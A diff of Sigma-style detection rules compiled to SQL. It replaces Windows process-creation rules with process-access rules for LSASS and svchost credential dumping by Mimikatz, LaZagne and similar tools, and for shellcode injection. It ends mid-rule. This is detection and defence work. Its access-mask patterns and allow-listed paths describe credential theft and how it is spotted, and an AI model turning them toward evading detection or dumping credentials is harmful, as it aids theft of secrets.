"tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage 
LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": 
"proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": 
"Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - 
"id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", 
- "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": 
"proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 
'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost 
Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. 
Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage 
LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 